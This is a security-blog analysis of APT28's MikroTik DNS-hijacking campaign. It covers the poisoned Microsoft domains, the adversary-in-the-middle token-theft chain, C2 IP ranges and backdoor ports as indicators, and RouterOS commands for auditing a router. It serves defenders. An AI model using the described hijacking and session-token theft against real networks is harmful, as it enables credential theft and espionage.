Endolum Academy · · 3 min read

Inside APT28's MikroTik DNS Hijacking Campaign

APT28 hijacked 18,000 routers to steal Microsoft 365 logins. How FrostArmada worked, why MikroTik keeps getting hit, and how to check your own.

threat-intelnetwork-securityapt

In December 2025, more than 18,000 SOHO routers spread across 120 countries were quietly forwarding traffic to servers controlled by Russian military intelligence. Most owners had no idea.

The campaign, tracked as FrostArmada and attributed to APT28 (also known as Forest Blizzard, Fancy Bear, or GRU Unit 26165), targeted MikroTik and TP-Link routers to hijack DNS resolution and steal Microsoft 365 credentials. The FBI publicly disrupted the core infrastructure on April 7, 2026. The problem it exposed is older than the campaign and will outlast it.

Here is what the attack actually did, why MikroTik keeps showing up in reports like this one, and what you should do if you run one.

What Happened

APT28 started compromising SOHO routers at scale in May 2025. By December the operation peaked. Researchers counted more than 18,000 unique hijacked IP addresses across 120 countries, hitting 200+ organizations and around 5,000 consumer devices.

The goal was straightforward. Once a router was under attacker control, they reconfigured its DNS and DHCP settings to point to attacker-run resolvers. From that point onward, every device on the network that asked “where is outlook.office.com?” got an answer picked by APT28.

Not every query was redirected. The malicious resolvers only poisoned specific domains:

  • autodiscover-s.outlook.com
  • imap-mail.outlook.com
  • outlook.live.com
  • outlook.office.com
  • outlook.office365.com

Legitimate answers came back for everything else. Your router looked normal. Your laptop resolved Google and Netflix just fine. Only when somebody on the network hit Microsoft login pages did the trap close. From the client side this is nearly invisible.

The Credential Theft Chain

Once DNS was under attacker control, the actual credential theft used a fairly classic adversary-in-the-middle (AitM) proxy:

  1. User navigates to outlook.office.com.
  2. The poisoned DNS sends them to an attacker-controlled server instead.
  3. That server presents a Microsoft-lookalike login page and captures credentials as they are typed.
  4. The attacker proxies the authentication back through the real Microsoft endpoint, capturing the session cookie, OAuth tokens, and any bearer tokens along the way.
  5. The victim sees their Outlook inbox load and moves on with their day.

The only client-side indicator some users saw was a browser warning about an untrusted source caused by the AitM certificate. Most corporate users who see that kind of warning click through it because they see the same thing every time their own firewall does TLS inspection.

Once APT28 had a valid session cookie, MFA did not help. They pulled mail, attachments, calendar entries, and contacts straight from the mailbox using the stolen token. Several compromised accounts belonged to ministries of foreign affairs, law enforcement agencies, and defense contractors. This was a signals intelligence operation running on top of consumer-grade networking equipment.

Technical Fingerprints

The compromised routers had reasonably specific signatures that network defenders flagged:

  • dnsmasq 2.85 listening on UDP 53
  • SSH on TCP 56777 and TCP 35681 (custom ports used for attacker access)
  • Selective DNS poisoning as described above

If you scan a router and find SSH answering on 56777, that is not a coincidence. MikroTik defaults to SSH on port 22. A five-digit SSH port on a device nobody remembers configuring is a strong indicator somebody else made that choice.

The reported C2 ranges included:

  • 5.226.137.151-245
  • 37.221.64.77-254
  • 77.83.197.37-60
  • 79.141.160-173.x
  • 185.117.88-89.x
  • 185.237.166.55-249

If your firewall logs show any internal device talking to those ranges, treat it as a probable compromise until you can prove otherwise.

Why MikroTik Keeps Getting Hit

APT28 did not pick MikroTik because the platform is weaker than its competitors. They picked it because a large, lightly managed, internet-exposed population exists. The same reason TrickBot, VPNFilter, and the Slingshot APT all targeted MikroTik before them.

A few reasons this keeps happening:

Management interfaces exposed to the internet. RouterOS has several management surfaces: Winbox (TCP 8291), the WebFig HTTP(S) panel, SSH, Telnet, the API service (TCP 8728), and FTP. Plenty of small offices and home setups leave one or more of these reachable from the public internet, often by accident. Shodan regularly indexes hundreds of thousands of Winbox listeners worldwide.

Outdated firmware. RouterOS updates require a manual decision from the admin. Devices installed five years ago tend to still be running whatever version shipped five years ago. CVE-2018-14847, a credential leak fixed in RouterOS 6.42 back in 2018, still finds victims in 2026 because those devices were never patched.

Default or weak credentials. Older RouterOS versions shipped with an admin account that had no password at all. Plenty of those devices are still online. Where passwords exist, they are often trivially guessable.

Complex capabilities in a small box. RouterOS is effectively a full Linux distribution with scripting, scheduling, and containerization. That power is great when you are the admin. It is also great when you are APT28 dropping a persistent SOCKS proxy, a cron job, and a DNS override into a compromised box.

MikroTik publishes patches and advisories promptly. The issue is the install base. A router is something most people set up once and never look at again.

The FBI Disruption and What It Did Not Fix

On April 7, 2026, the FBI announced a court-authorized technical operation that reached into compromised routers and reversed the malicious DNS configuration, pointing the devices back at legitimate ISP resolvers. This is the same general approach used in earlier cleanup operations against VPNFilter and Cyclops Blink.

That is useful. It is also a one-time fix that did several things it could not do:

  • It did not patch the underlying vulnerability or weak credential that let APT28 in the first time.
  • It did not change admin passwords on the affected routers.
  • It did not close exposed management interfaces.
  • It did not remove any secondary backdoors that may have been dropped beyond the DNS config.

If you were one of the 18,000, your DNS is clean as of last week. Your router is still running the same firmware with the same exposed services and the same password it had when APT28 walked in. Expect the next opportunistic actor to try the same door.

How to Check Your Own Router

If you run a MikroTik box (and most of the advice generalizes to any SOHO router):

1. Check what is exposed to the internet.

Your public IP should not answer on Winbox, WebFig, SSH, Telnet, FTP, or the RouterOS API. From an external network (a phone tethered to mobile data works fine), try connecting to your public IP on ports 8291, 80, 443, 22, 23, 21, and 8728. Anything that responds is a problem.

For a broader check that covers all 65535 ports and cross-references known CVE fingerprints, Sentinel scans your public IP and delivers an AI-written report in about thirty minutes. Free, no account required. This is the same kind of perimeter visibility that would have shown most FrostArmada victims they had Winbox or SSH exposed months before anyone at APT28 got around to them. For a home-network-focused walkthrough, see our home network scan guide.

2. Audit DNS and DHCP settings on the router.

Log in through the local interface. Check the DNS server list:

/ip dns print

Check the DHCP server configuration:

/ip dhcp-server network print

Anything pointing at an IP you do not recognize is suspicious. Compare with your ISP’s documented resolvers or a known public resolver like Cloudflare (1.1.1.1) or Google (8.8.8.8).

3. List all scheduled scripts and jobs.

/system scheduler print
/system script print

A clean router typically has nothing or a small number of admin-defined entries. If you see scheduled tasks with names you do not recognize, fetch commands, or scripts that call out to an IP address, you have a problem.

4. Check for unusual users.

/user print

Extra admin-level accounts that you did not create are a classic persistence mechanism.

5. Patch the firmware.

/system routerboard print
/system package update check-for-updates

Run the latest stable RouterOS in the long-term release channel for your platform. If your device is end-of-life and no longer receiving updates, replace it. There is no workaround for unpatchable firmware.

6. Rotate credentials.

Assume the current password is known to someone else. Change the admin password, remove any default accounts, and apply IP restrictions on the admin users so they can only log in from your internal network. Use keys for SSH and disable password authentication.

7. If you find anything suspicious, reset to factory defaults.

A compromised router cannot be fully trusted after the fact. APT28 and others drop persistence mechanisms that do not always show up in the obvious configuration trees. Netinstall the latest firmware, configure from scratch, and do not restore from a pre-compromise backup.

What Organizations Should Do Differently

If you run routers like these across a fleet (branch offices, managed service customers, IoT deployments), the single largest improvement is visibility into what is actually exposed externally. Most compromised SOHO routers are not compromised because of a zero-day. They are compromised because nobody audited the management surface.

A recurring external scan of your public IP space catches this. So does certificate pinning on managed devices, which means an AitM proxy cannot silently decrypt Microsoft 365 traffic even when DNS is poisoned. Centralized DNS resolution (forcing endpoints to use a known good resolver instead of whatever DHCP hands them) removes the DNS hijack payoff entirely for the devices you manage.

None of this is new advice. The FrostArmada victims almost all had one or more of these gaps for years before APT28 showed up.

The Broader Pattern

APT28 is not the only group doing this. The commodity MikroTik botnet written up in January 2025 (around 13,000 devices running SOCKS4 proxies and relaying malspam) is still out there. Infoblox has documented separate Russian-speaking botnets built on the same hardware with DNS misconfiguration as the entry point. Smaller campaigns come and go constantly.

For a reader running a single home MikroTik, this is mostly a motivation to audit the box and patch it. For anyone running critical infrastructure, the lesson is that routers are computers, and unmanaged computers exposed to the internet get compromised on a timeline measured in weeks. If the device has not been reviewed since it was unboxed, it is a candidate for something.

The interesting part of FrostArmada is not that APT28 ran it. It is that the operation ran for eight months at 18,000-IP scale before anyone disrupted it. That is a long time to be somebody else’s signals intelligence platform.

If you want to see what your own public IP looks like to a scanner like the ones APT28 used for reconnaissance, Sentinel runs the check and sends back a report with specific findings and fixes. Free, no account, about thirty minutes. The same visibility that would have flagged most FrostArmada exposures a year before anyone got to them.